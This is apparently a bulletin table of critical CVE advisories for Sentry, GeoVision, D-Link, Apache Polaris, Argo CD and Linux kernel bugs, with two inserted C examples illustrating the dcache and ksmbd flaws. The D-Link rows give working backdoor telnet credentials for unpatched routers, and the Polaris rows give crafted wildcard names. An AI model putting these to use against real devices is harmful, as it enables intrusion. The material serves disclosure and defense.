| getsentry--sentry | Sentry is an error tracking and performance monitoring tool. From version 21.12.0 to before version 26.4.1, a critical vulnerability was discovered in the SAML SSO implementation of Sentry. The vulnerability allows an attacker to take over any user account by using a malicious SAML Identity Provider and another organization on the same Sentry instance. The victim email address must be known in order to exploit this vulnerability. This issue has been patched in version 26.4.1. | 2026-05-08 | 9.1 | CVE-2026-42354 | https://github.com/getsentry/sentry/security/advisories/GHSA-rcmw-7mc7-3rj7 https://github.com/getsentry/sentry/pull/113720 https://github.com/getsentry/sentry/commit/0c67558ae7fe08738912d4c5233b53ead048da3b https://github.com/getsentry/sentry/releases/tag/26.4.1 |
| GeoVision Inc.--GV-LPC2011/LPC2211 | An OS command injection vulnerability exists in the DdnsSetting.cgi functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted DDNS configuration can lead to arbitrary command execution. An attacker can modify a configuration value to trigger this vulnerability. | 2026-05-04 | 9.9 | CVE-2026-42364 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| GeoVision Inc.--GV-LPC2011/LPC2211 | A privilege escalation vulnerability exists in the web interface functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted HTTP request can lead to the execution of a privileged operation. An attacker can visit a webpage to trigger this vulnerability. | 2026-05-04 | 9.9 | CVE-2026-42368 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| GeoVision Inc.--GV-VMS V20.0.2 | A stack overflow vulnerability exists in the WebCam Server Login functionality of GeoVision GV-VMS V20 20.0.2. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can make an unauthenticated HTTP request to trigger this vulnerability. | 2026-05-04 | 9 | CVE-2026-42370 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| D-Link--DIR-605L Firmware | D-Link DIR-605L Hardware Revision B2 (End-of-Life, EOL) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username "Alphanetworks" and the static password "wrgn76_dlwbr_dir605L" read from /etc/alpha_config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches. | 2026-05-04 | 9.8 | CVE-2026-42373 | D-Link DIR-605L B2 Hardcoded Telnet Backdoor - Securin Advisory |
| D-Link--DIR-600L Firmware | D-Link DIR-600L Hardware Revision B1 (End-of-Life) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username "Alphanetworks" and the static password "wrgn61_dlwbr_dir600L" read from /etc/alpha_config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches. | 2026-05-04 | 9.8 | CVE-2026-42374 | D-Link DIR-600L B1 Hardcoded Telnet Backdoor - Securin Advisory |
| D-Link--DIR-600L Firmware | D-Link DIR-600L Hardware Revision A1 (End-of-Life) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username "Alphanetworks" and the static password "wrgn35_dlwbr_dir600l" read from /etc/alpha_config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches. | 2026-05-04 | 9.8 | CVE-2026-42375 | D-Link DIR-600L A1 Hardcoded Telnet Backdoor - Securin Advisory |
| D-Link--DIR-456U Firmware | D-Link DIR-456U Hardware Revision A1 (End-of-Life, EOL) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /etc/init0.d/S80telnetd.sh with the username "Alphanetworks" and the static password "whdrv01_dlob_dir456U" read from /etc/config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches. | 2026-05-04 | 9.8 | CVE-2026-42376 | D-Link DIR-456U A1 Hardcoded Telnet Backdoor - Securin Advisory |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.1.0, all Docker container management endpoints in Termix interpolate the containerId URL path parameter and WebSocket message field directly into shell commands executed via ssh2.Client.exec() on remote managed servers without any sanitization or validation. An authenticated attacker can inject arbitrary OS commands by crafting a malicious container ID, achieving Remote Code Execution on any managed server. This issue has been patched in version 2.1.0. | 2026-05-08 | 9.9 | CVE-2026-42454 | https://github.com/Termix-SSH/Termix/security/advisories/GHSA-c2g2-hqgq-6w9v https://github.com/Termix-SSH/Termix/releases/tag/release-2.1.0-tag |
| go-pkgz--auth | auth provides authentication via oauth2, direct and email. From versions 1.18.0 to before 1.25.2 and 2.0.0 to before 2.1.2, the Patreon OAuth provider maps every authenticated Patreon account to the same local user.ID, instead of deriving a unique ID from the Patreon account returned by Patreon. In practice, this means all Patreon-authenticated users of an application using this library are collapsed into a single local identity. Any application that trusts token.User.ID as the stable account key can end up mixing or fully merging unrelated Patreon users, which can lead to cross-account access, privilege confusion, and subscription-state leakage. This issue has been patched in versions 1.25.2 and 2.1.2. | 2026-05-09 | 9.1 | CVE-2026-42560 | https://github.com/go-pkgz/auth/security/advisories/GHSA-f6qq-3m3h-4g42 https://github.com/go-pkgz/auth/commit/c0b15ee72a8401da83c01781c16636c521f42698 https://github.com/go-pkgz/auth/releases/tag/v1.25.2 https://github.com/go-pkgz/auth/releases/tag/v2.1.2 |
| phpvms--phpvms | phpVMS is a PHP application to run and simulate an airline. Prior to version 7.0.6, a critical vulnerability in phpVMS allowed unauthenticated access to a legacy import feature. This issue has been patched in version 7.0.6. | 2026-05-09 | 9.4 | CVE-2026-42569 | https://github.com/phpvms/phpvms/security/advisories/GHSA-fv26-4939-62fh https://github.com/phpvms/phpvms/commit/f59ba8e0e8fc25c60c3faf14e526cfd49df3f7dc https://github.com/phpvms/phpvms/releases/tag/7.0.6 https://github.com/phpvms/phpvms/releases/tag/7.0.7 |
| Arelle--Arelle | Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges. | 2026-05-04 | 9.8 | CVE-2026-42796 | https://github.com/Arelle/Arelle/releases/tag/2.39.10 https://github.com/Arelle/Arelle/pull/2320 https://www.vulncheck.com/advisories/arelle-unauthenticated-rce-via-rest-configure |
| Apache Software Foundation--Apache Polaris | Apache Polaris can issue broad temporary ("vended") storage credentials during staged table creation before the effective table location has been validated or durably reserved. Those temporary credentials are meant to limit the scope of accessible table data and metadata, but this scope limitation becomes attacker-directed because the attacker can choose a reachable target location. In the confirmed variant, if the caller supplies a custom `location` during stage create and requests credential vending, Apache Polaris uses that location to construct delegated storage credentials immediately. The stage-create path itself neither runs the normal location validation nor the overlap checks before those credentials are issued. Closely related to that, the staged-create flow also accepts `write.data.path` / `write.metadata.path` in the request properties and feeds those location overrides into the same effective table location set used for credential vending. Those fields are secondary to the main custom-`location` exploit, but they are still attacker-influenced location inputs that should be validated before any credentials are issued. | 2026-05-04 | 9.9 | CVE-2026-42809 | https://lists.apache.org/thread/8tfsr8y7pgq6rdcvjx95hkcr47td671r |
| Apache Software Foundation--Apache Polaris | Apache Polaris accepts literal `*` characters in namespace and table names. When it later builds temporary S3 access policies for delegated table access, those same characters appear to be reused unescaped in S3 IAM resource patterns and `s3:prefix` conditions. In S3 IAM policy matching, `*` is treated as a wildcard rather than as ordinary text. That means temporary credentials issued for one crafted table can match the storage path of a different table. In private testing against Polaris 1.4.0 using Polaris' AWS S3 temporary-credential path on both MinIO and real AWS S3, credentials returned for crafted tables such as `f*.t1`, `f*.*`, `*.*`, and `foo.*` could reach other tables' S3 locations. The confirmed behavior includes: - reading another table's metadata control file (Iceberg metadata JSON); - listing another table's exact S3 table prefix; - and, when write delegation was returned for the crafted table, creating and deleting an object under another table's exact S3 table prefix. A control case using ordinary different names did not allow the same cross-table access. A least-privilege AWS S3 variant was also confirmed in which the attacker principal had no Polaris permissions on the victim table and only the minimal permissions required to create and use a crafted wildcard table (namespace-scoped `TABLE_CREATE` and `TABLE_WRITE_DATA` on `*`). In that setup, direct Polaris access to `foo.t1` remained forbidden, but the attacker could still create and load `*.*`, receive delegated S3 credentials, and use those credentials to list, read, create, and delete objects under `foo.t1`. In Iceberg, the metadata JSON file is a control file: it tells readers which data files belong to the table, which snapshots exist, and which table version to read. So unauthorized access to it is already a meaningful confidentiality problem. The confirmed write-capable variant means the issue is not limited to disclosure. | 2026-05-04 | 9.9 | CVE-2026-42810 | https://lists.apache.org/thread/gg3qq9sqg4hdjmprqy46p40xmln61dm9 |
| Apache Software Foundation--Apache Polaris | In plain terms, Apache Polaris is supposed to issue short-lived GCS credentials that only work for one table's files, but a crafted namespace or table name can cause those credentials to work across the configured bucket instead. Apache Polaris builds Google Cloud Storage downscoped credentials by creating a Credential Access Boundary (CAB) with CEL conditions that are intended to restrict access to the requested table's storage path. The relevant CEL string is built from the bucket name and the table path. That table path is derived from namespace and table identifiers. In current code, that path appears to be inserted into the CEL expression without escaping. As a result, a namespace or table identifier containing a single quote and other URI-safe CEL fragments can break out of the intended quoted string and change the meaning of the CEL condition. In private testing against Polaris 1.4.0 on real Google Cloud Storage, it was confirmed that Polaris accepted a crafted identifier and returned delegated GCS credentials whose CEL path restriction had effectively collapsed. Those delegated credentials could then: - list another table's object prefix; - read another table's metadata control file (Iceberg metadata JSON); - create and delete an object under another table's object prefix; - and also list, read, create, and delete objects under an unrelated external prefix in the same bucket that was not part of any table path. That last point is important. The issue is not limited to "another table". In the confirmed setup, once Apache Polaris returned credentials for the crafted table, the path restriction inside the configured bucket was effectively gone. The practical effect is that temporary credentials for one crafted table can be broader than the table Polaris was asked to authorize, and can become effectively bucket-wide within the configured bucket. The current GCS testing used a Polaris principal with broad catalog privileges for setup. A separate least-privilege Polaris RBAC variant has not yet been tested on GCS. However, the storage-credential broadening behavior itself has been confirmed on GCS. | 2026-05-04 | 9.9 | CVE-2026-42811 | https://lists.apache.org/thread/hovn5hmkj9wj7v9cd8sn67svg03klgvg |
| Apache Software Foundation--Apache Polaris | In Apache Iceberg, the table's metadata files are control files: they tell readers which data files belong to the table and which table version to read. `write.metadata.path` is an optional table property that tells Polaris where to write those metadata files. For a table already registered in a Polaris-managed catalog, changing only that property through an `ALTER TABLE`-style settings change (not a row-level `INSERT`, `SELECT`, `UPDATE`, or `DELETE`) bypasses the commit-time branch that is supposed to revalidate storage locations. The full persisted / credential-vending variant requires the affected catalog to have `polaris.config.allow.unstructured.table.location=true`, with `allowedLocations` broad enough to include the attacker-chosen target. `allowedLocations` is the admin-configured allowlist of storage paths that the catalog is allowed to use. Public project materials suggest that this flag is a real supported compatibility / layout mode, not just a contrived lab-only prerequisite. In that configuration, a user who can change table settings can cause Apache Polaris itself to write new table metadata to an attacker-chosen reachable storage location before the intended location-validation branch runs. If the later concrete-path validation also accepts that location, Polaris persists the resulting metadata path into stored table state. Later table-load and credential APIs can then return temporary cloud-storage credentials for the same location without revalidating it. In plain terms, Polaris can later hand out temporary storage access for the same attacker-chosen area. That attacker-chosen area does not need to be limited to the poisoned table's own files. If it is a broader storage prefix, another table's prefix, or, depending on configuration or provider behavior, even a bucket/container root, the resulting disclosure or corruption scope can extend to any data and metadata Polaris can reach there. The practical consequences are therefore similar to the staged-create credential-vending issue already discussed: data and metadata reachable in that storage scope can be exposed and, if write-capable credentials are later issued, modified, corrupted, or removed. Even before that later credential step, Polaris itself performs the metadata write to the unchecked location. So the core issue is not only later credential vending. The primary defect is that Polaris skips its intended location checks before performing a security-sensitive metadata write when only `write.metadata.path` changes. When `polaris.config.allow.unstructured.table.location=false`, current code review suggests the later `updateTableLike(...)` validation usually rejects out-of-tree metadata locations before the unsafe path is persisted. That may reduce the persisted / credential-vending variant, but it does not prevent the underlying defect: Polaris still skips the intended pre-write location check when only `write.metadata.path` changes. | 2026-05-04 | 9.9 | CVE-2026-42812 | https://lists.apache.org/thread/wxd2wj3p0smvrk84msv317wg5tp3jtw9 |
| argoproj--argo-cd | Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. From versions 3.2.0 to before 3.2.11 and 3.3.0 to before 3.3.9, there is a missing authorization and data-masking gap in Argo CD's ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server's Server-Side Apply dry-run mechanism. This issue has been patched in versions 3.2.11 and 3.3.9. | 2026-05-07 | 9.6 | CVE-2026-42880 | https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: handle wraparound when searching for blocks for indirect mapped blocks Commit 4865c768b563 ("ext4: always allocate blocks only from groups inode can use") restricts what blocks will be allocated for indirect block based files to block numbers that fit within 32-bit block numbers. However, when using a review bot running on the latest Gemini LLM to check this commit when backporting into an LTS based kernel, it raised this concern: If ac->ac_g_ex.fe_group is >= ngroups (for instance, if the goal group was populated via stream allocation from s_mb_last_groups), then start will be >= ngroups. Does this allow allocating blocks beyond the 32-bit limit for indirect block mapped files? The commit message mentions that ext4_mb_scan_groups_linear() takes care to not select unsupported groups. However, its loop uses group = *start, and the very first iteration will call ext4_mb_scan_group() with this unsupported group because next_linear_group() is only called at the end of the iteration. After reviewing the code paths involved and considering the LLM review, I determined that this can happen when there is a file system where some files/directories are extent-mapped and others are indirect-block mapped. To address this, add a safety clamp in ext4_mb_scan_groups(). | 2026-05-05 | 9.8 | CVE-2026-43067 | https://git.kernel.org/stable/c/f89bba144938921a2249237ad04a0183ff3f8930 https://git.kernel.org/stable/c/83170a05908b6cf2fb3235d3065bf613ff866f3c https://git.kernel.org/stable/c/4bec4a498ce86314d470ae6144120461f2138c29 https://git.kernel.org/stable/c/12624c5b724a81e14e532972b40d863b0de3b7d1 https://git.kernel.org/stable/c/2a368ccddfc492a0aa951e2caef2985f20e96503 https://git.kernel.org/stable/c/bb81702370fad22c06ca12b6e1648754dbc37e0f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dcache: Limit the minimal number of bucket to two There is an OOB read problem on dentry_hashtable when user sets 'dhash_entries=1': BUG: unable to handle page fault for address: ffff888b30b774b0 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page Oops: Oops: 0000 [#1] SMP PTI RIP: 0010:__d_lookup+0x56/0x120 Call Trace: d_lookup.cold+0x16/0x5d lookup_dcache+0x27/0xf0 lookup_one_qstr_excl+0x2a/0x180 start_dirop+0x55/0xa0 simple_start_creating+0x8d/0xa0 debugfs_start_creating+0x8c/0x180 debugfs_create_dir+0x1d/0x1c0 pinctrl_init+0x6d/0x140 do_one_initcall+0x6d/0x3d0 kernel_init_freeable+0x39f/0x460 kernel_init+0x2a/0x260 There will be only one bucket in dentry_hashtable when dhash_entries is set as one, and d_hash_shift is calculated as 32 by dcache_init(). Then, the following process will access more than one bucket (whose memory region is not allocated) in dentry_hashtable: d_lookup b = d_hash(hash) dentry_hashtable + ((u32)hashlen >> d_hash_shift) // The C standard defines the behavior of right shift amounts // exceeding the bit width of the operand as undefined. The // result of '(u32)hashlen >> d_hash_shift' becomes 'hashlen', // so 'b' will point to an unallocated memory region. hlist_bl_for_each_entry_rcu(b) hlist_bl_first_rcu(head) h->first // read OOB! Fix it by limiting the minimal number of dentry_hashtable bucket to two, so that 'd_hash_shift' won't exceed the bit width of type u32. | 2026-05-05 | 9.1 | CVE-2026-43071 | https://git.kernel.org/stable/c/426ef05e82ee52c8d0e95fc0808b7383d8352d73 https://git.kernel.org/stable/c/ddd57ebce245f9c7e2f6902a6c087d6186d2385d https://git.kernel.org/stable/c/755b40903eff563768d4d96fd4ef51ec48adde3b https://git.kernel.org/stable/c/5718df131ab78897a9dd1f2e71c3ba732d4392af https://git.kernel.org/stable/c/277cedabb0ab86baae83fa58218be13c6d3e5526 https://git.kernel.org/stable/c/f08fe8891c3eeb63b73f9f1f6d97aa629c821579 |
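The dcache entry above turns on one arithmetic fact: a power-of-two table of N buckets is indexed by `hash >> (32 - log2 N)`, and with N = 1 that shift count is 32, which C leaves undefined for a 32-bit operand (on x86 the hardware masks the count to five bits, so the shift does nothing and the whole hash becomes the index). The following is an added example, not kernel code, that models the sizing arithmetic and the clamp the fix introduces; the function names and the rounding of the requested count to a power of two are assumptions made for illustration.

```c
#include <stdint.h>
#include <stddef.h>

/* Added example (not kernel code): dcache-style table sizing. Bucket
 * selection is hashlen >> shift with shift = 32 - log2(buckets). One bucket
 * gives shift == 32, an undefined shift for a 32-bit value. */

#define HASH_BITS 32u

/* Round the requested count up to a power of two (assumed here to mirror the
 * allocator's behaviour), then apply the fix: never fewer than two buckets. */
unsigned long dcache_bucket_count(unsigned long requested)
{
    unsigned long n = 1;
    while (n < requested)
        n <<= 1;
    return n < 2 ? 2 : n;       /* the clamp added by the fix */
}

/* The same rounding without the clamp: dhash_entries=1 yields one bucket. */
unsigned long dcache_bucket_count_unclamped(unsigned long requested)
{
    unsigned long n = 1;
    while (n < requested)
        n <<= 1;
    return n;
}

/* 32 for one bucket, 31 for two, 22 for 1024, ... */
unsigned dcache_hash_shift(unsigned long buckets)
{
    unsigned log2 = 0;
    while ((1ul << log2) < buckets)
        log2++;
    return HASH_BITS - log2;
}

/* Bucket selection as d_hash() does it. Returns -1 instead of performing an
 * undefined shift; that is exactly the case the clamp rules out. */
long dcache_bucket_index(uint32_t hashlen, unsigned shift)
{
    if (shift >= HASH_BITS)
        return -1;
    return (long)(hashlen >> shift);
}

int main(void)
{
    unsigned long one = dcache_bucket_count_unclamped(1);
    unsigned long two = dcache_bucket_count(1);
    /* with the clamp every index is < bucket count; without it the shift is UB */
    return dcache_bucket_index(0xdeadbeefu, dcache_hash_shift(two)) < (long)two &&
           dcache_bucket_index(0xdeadbeefu, dcache_hash_shift(one)) == -1 ? 0 : 1;
}
```

The same check applies to any boot-time or user-supplied table size: derive the shift from the actual allocation, then assert that the shift is strictly less than the width of the hash before it is ever used.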
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ioam6: fix OOB and missing lock When trace->type.bit6 is set: if (trace->type.bit6) { ... queue = skb_get_tx_queue(dev, skb); qdisc = rcu_dereference(queue->qdisc); This code can lead to an out-of-bounds access of the dev->_tx[] array when is_input is true. In such a case, the packet is on the RX path and skb->queue_mapping contains the RX queue index of the ingress device. If the ingress device has more RX queues than the egress device (dev) has TX queues, skb_get_queue_mapping(skb) will exceed dev->num_tx_queues. Add a check to avoid this situation since skb_get_tx_queue() does not clamp the index. This issue has also revealed that per queue visibility cannot be accurate and will be replaced later as a new feature. While at it, add missing lock around qdisc_qstats_qlen_backlog(). The function __ioam6_fill_trace_data() is called from both softirq and process contexts, hence the use of spin_lock_bh() here. | 2026-05-06 | 9.1 | CVE-2026-43083 | https://git.kernel.org/stable/c/6d1d9ed9b409e0662241e3d245d574a18f643494 https://git.kernel.org/stable/c/95a1334748c95dd15546056280ade0c4b8dd7b78 https://git.kernel.org/stable/c/b30b1675aa2bcf0491fd3830b051df4e08a7c8ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_pipapo_avx2: don't return non-matching entry on expiry New test case fails unexpectedly when avx2 matching functions are used. The test first loads a randomly generated pipapo set with 'ipv4 . port' key, i.e. nft -f foo. This works. Then, it reloads the set after a flush: (echo flush set t s; cat foo) | nft -f - This is expected to work, because it's the same set after all and it was already loaded once. But with avx2, this fails: nft reports a clashing element. The reported clash is of following form: We successfully re-inserted a . b c . d Then we try to insert a . d avx2 finds the already existing a . d, which (due to 'flush set') is marked as invalid in the new generation. It skips the element and moves to next. Due to incorrect masking, the skip-step finds the next matching element *only considering the first field*, i.e. we return the already reinserted "a . b", even though the last field is different and the entry should not have been matched. No such error is reported for the generic c implementation (no avx2) or when the last field has to use the 'nft_pipapo_avx2_lookup_slow' fallback. Bisection points to 7711f4bb4b36 ("netfilter: nft_set_pipapo: fix range overlap detection") but that fix merely uncovers this bug. Before this commit, the wrong element is returned, but erroneously reported as a full, identical duplicate. The root-cause is too early return in the avx2 match functions. When we process the last field, we should continue to process data until the entire input size has been consumed to make sure no stale bits remain in the map. | 2026-05-06 | 9.4 | CVE-2026-43114 | https://git.kernel.org/stable/c/fa4f1f52528c73989d820f32bfca06bec5afeece https://git.kernel.org/stable/c/3d53f9aafd469ae1ea27051e00f5b96ca1b55d52 https://git.kernel.org/stable/c/07de44424bb7f17ef9357e8535df96d9e97c40cb https://git.kernel.org/stable/c/0abbc43f71d99baadeeba6fa3fe1c80b676f57ed https://git.kernel.org/stable/c/d3c0037ffe1273fa1961e779ff6906234d6cf53c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: tracepoints: get correct superblock from dentry in event btrfs_sync_file() If overlay is used on top of btrfs, dentry->d_sb translates to overlay's super block and fsid assignment will lead to a crash. Use file_inode(file)->i_sb to always get btrfs_sb. | 2026-05-06 | 9.1 | CVE-2026-43117 | https://git.kernel.org/stable/c/c09a7446aab5773f38d6abb25fce99b8e1dfbc97 https://git.kernel.org/stable/c/32372781d664a9b03c40343e96c29d0a6139f97d https://git.kernel.org/stable/c/2e4adfaec97ee053ad1bdfb5036845e66f7e0d8a https://git.kernel.org/stable/c/d110d7cdb045715c0b45b0dfd974525bb38f653d https://git.kernel.org/stable/c/a85b46db143fda5869e7d8df8f258ccef5fa1719 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dlm: validate length in dlm_search_rsb_tree The len parameter in dlm_dump_rsb_name() is not validated and comes from network messages. When it exceeds DLM_RESNAME_MAXLEN, it can cause out-of-bounds write in dlm_search_rsb_tree(). Add length validation to prevent potential buffer overflow. | 2026-05-06 | 9.8 | CVE-2026-43125 | https://git.kernel.org/stable/c/67288113c5e6cf9e659b4065c0ed6f16100e0c71 https://git.kernel.org/stable/c/082083c9fbd99422a0370fe2102144a231c9f5d6 https://git.kernel.org/stable/c/5f053a2e7209d326cbbc07738fa6d6893d307438 https://git.kernel.org/stable/c/080e5563f878c64e697b89e7439d730d0daad882 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix signedness bug in smb_direct_prepare_negotiation() smb_direct_prepare_negotiation() casts an unsigned __u32 value from sp->max_recv_size and req->preferred_send_size to a signed int before computing min_t(int, ...). A maliciously provided preferred_send_size of 0x80000000 will return as smaller than max_recv_size, and then be used to set the maximum allowed receive size for the next message. By sending a second message with a large value (>1420 bytes) the attacker can then achieve a heap buffer overflow. This fix replaces min_t(int, ...) with min_t(u32) | 2026-05-06 | 9.8 | CVE-2026-43185 | https://git.kernel.org/stable/c/ceae058eb707ddd0d68f0872f9d9f23b7c30c37b https://git.kernel.org/stable/c/55abc475d096da4a5356b6efb0cfdc6156bc1550 https://git.kernel.org/stable/c/6b4f875aac344cdd52a1f34cc70ed2f874a65757 |
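The ksmbd negotiation bug above is a pure type-width mistake: both sizes are unsigned 32-bit on the wire, but once cast to int, 0x80000000 becomes INT_MIN and wins a signed min(). The following is an added example, not ksmbd code, that reproduces the arithmetic of the vulnerable and fixed comparisons and shows why the second message then slips past the only length check it faces. The receive-buffer size and the payload lengths are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example (not kernel code): the min() that negotiates the receive
 * size, in its signed and unsigned forms. RECV_BUF_LEN is a constructed
 * buffer size standing in for the server's real receive buffer. */
#define RECV_BUF_LEN 1364u

/* Vulnerable shape, min_t(int, ...) on two __u32 values. Converting
 * 0x80000000 to int is implementation-defined in C; on the two's-complement
 * compilers the kernel is built with it yields INT_MIN, so it compares as
 * smaller than any sane size. */
uint32_t negotiate_recv_size_vulnerable(uint32_t max_recv_size,
                                        uint32_t preferred_send_size)
{
    int a = (int)max_recv_size;
    int b = (int)preferred_send_size;
    return (uint32_t)(a < b ? a : b);
}

/* Fixed shape, min_t(u32, ...): compare in the type the wire uses. */
uint32_t negotiate_recv_size_fixed(uint32_t max_recv_size,
                                   uint32_t preferred_send_size)
{
    return max_recv_size < preferred_send_size ? max_recv_size
                                               : preferred_send_size;
}

/* The gate the next message has to pass: its length against the negotiated
 * size. Nothing else stands between it and the fixed-size receive buffer. */
int second_message_accepted(uint32_t negotiated_size, uint32_t data_len)
{
    return data_len <= negotiated_size;
}

/* Accepted by the gate yet larger than the buffer it lands in. */
int second_message_overflows(uint32_t negotiated_size, uint32_t data_len)
{
    return second_message_accepted(negotiated_size, data_len) &&
           data_len > RECV_BUF_LEN;
}

int main(void)
{
    uint32_t evil = 0x80000000u;   /* attacker-chosen preferred_send_size */
    uint32_t v = negotiate_recv_size_vulnerable(RECV_BUF_LEN, evil);
    uint32_t f = negotiate_recv_size_fixed(RECV_BUF_LEN, evil);
    printf("vulnerable negotiated size: 0x%08x\n", v);
    printf("fixed negotiated size:      0x%08x\n", f);
    printf("4096-byte follow-up overflows: vulnerable=%d fixed=%d\n",
           second_message_overflows(v, 4096u), second_message_overflows(f, 4096u));
    return 0;
}
```

When auditing similar code, look for `min_t(int, ...)`, `min_t(s32, ...)` or explicit `(int)` casts applied to lengths that arrive from a peer; if the field is unsigned on the wire, the comparison must be too.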
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: ioam: fix heap buffer overflow in __ioam6_fill_trace_data() On the receive path, __ioam6_fill_trace_data() uses trace->nodelen to decide how much data to write for each node. It trusts this field as-is from the incoming packet, with no consistency check against trace->type (the 24-bit field that tells which data items are present). A crafted packet can set nodelen=0 while setting type bits 0-21, causing the function to write ~100 bytes past the allocated region (into skb_shared_info), which corrupts adjacent heap memory and leads to a kernel panic. Add a shared helper ioam6_trace_compute_nodelen() in ioam6.c to derive the expected nodelen from the type field, and use it: - in ioam6_iptunnel.c (send path, existing validation) to replace the open-coded computation; - in exthdrs.c (receive path, ipv6_hop_ioam) to drop packets whose nodelen is inconsistent with the type field, before any data is written. Per RFC 9197, bits 12-21 are each short (4-octet) fields, so they are included in IOAM6_MASK_SHORT_FIELDS (changed from 0xff100000 to 0xff1ffc00). | 2026-05-06 | 9.8 | CVE-2026-43186 | https://git.kernel.org/stable/c/f4d9d4b8fd839719d564651671e24c62c545c23b https://git.kernel.org/stable/c/fb3c662fafebc5b9d74417ed1de8759f6bb72143 https://git.kernel.org/stable/c/632d233cf2e64a46865ae2c064ae3c9df7c8864f https://git.kernel.org/stable/c/0591d6509c2ff13f09ea2998434aba0c0472e978 https://git.kernel.org/stable/c/e90346a2f1e8917d5760a44a1f61c44e3b36d96b https://git.kernel.org/stable/c/ea3632aefc04205436868541638e26f4a74d5637 https://git.kernel.org/stable/c/6db8b56eed62baacaf37486e83378a72635c04cc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netconsole: avoid OOB reads, msg is not nul-terminated msg passed to netconsole from the console subsystem is not guaranteed to be nul-terminated. Before recent commit 7eab73b18630 ("netconsole: convert to NBCON console infrastructure") the message would be placed in printk_shared_pbufs, a static global buffer, so KASAN had harder time catching OOB accesses. Now we see: printk: console [netcon_ext0] enabled BUG: KASAN: slab-out-of-bounds in string+0x1f7/0x240 Read of size 1 at addr ffff88813b6d4c00 by task pr/netcon_ext0/594 CPU: 65 UID: 0 PID: 594 Comm: pr/netcon_ext0 Not tainted 6.19.0-11754-g4246fd6547c9 Call Trace: kasan_report+0xe4/0x120 string+0x1f7/0x240 vsnprintf+0x655/0xba0 scnprintf+0xba/0x120 netconsole_write+0x3fe/0xa10 nbcon_emit_next_record+0x46e/0x860 nbcon_kthread_func+0x623/0x750 Allocated by task 1: nbcon_alloc+0x1ea/0x450 register_console+0x26b/0xe10 init_netconsole+0xbb0/0xda0 The buggy address belongs to the object at ffff88813b6d4000 which belongs to the cache kmalloc-4k of size 4096 The buggy address is located 0 bytes to the right of allocated 3072-byte region [ffff88813b6d4000, ffff88813b6d4c00) | 2026-05-06 | 9.1 | CVE-2026-43197 | https://git.kernel.org/stable/c/3126a2f98beaec5a554a1fb31c46db1e8542665e https://git.kernel.org/stable/c/74ab1456eaa3b2eb986138f9e1f4cb37e73b6f58 https://git.kernel.org/stable/c/82aec772fca2223bc5774bd9af486fd95766e578 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tcp: fix potential race in tcp_v6_syn_recv_sock() Code in tcp_v6_syn_recv_sock() after the call to tcp_v4_syn_recv_sock() is done too late. After tcp_v4_syn_recv_sock(), the child socket is already visible from TCP ehash table and other cpus might use it. Since newinet->pinet6 is still pointing to the listener ipv6_pinfo bad things can happen as syzbot found. Move the problematic code in tcp_v6_mapped_child_init() and call this new helper from tcp_v4_syn_recv_sock() before the ehash insertion. This allows the removal of one tcp_sync_mss(), since tcp_v4_syn_recv_sock() will call it with the correct context. | 2026-05-06 | 9.8 | CVE-2026-43198 | https://git.kernel.org/stable/c/fe89b2f05b854847784f91127319172945c1fadd https://git.kernel.org/stable/c/7178e2a8027423b2af17ab95df73a749a5b72e5b https://git.kernel.org/stable/c/858d2a4f67ff69e645a43487ef7ea7f28f06deae |
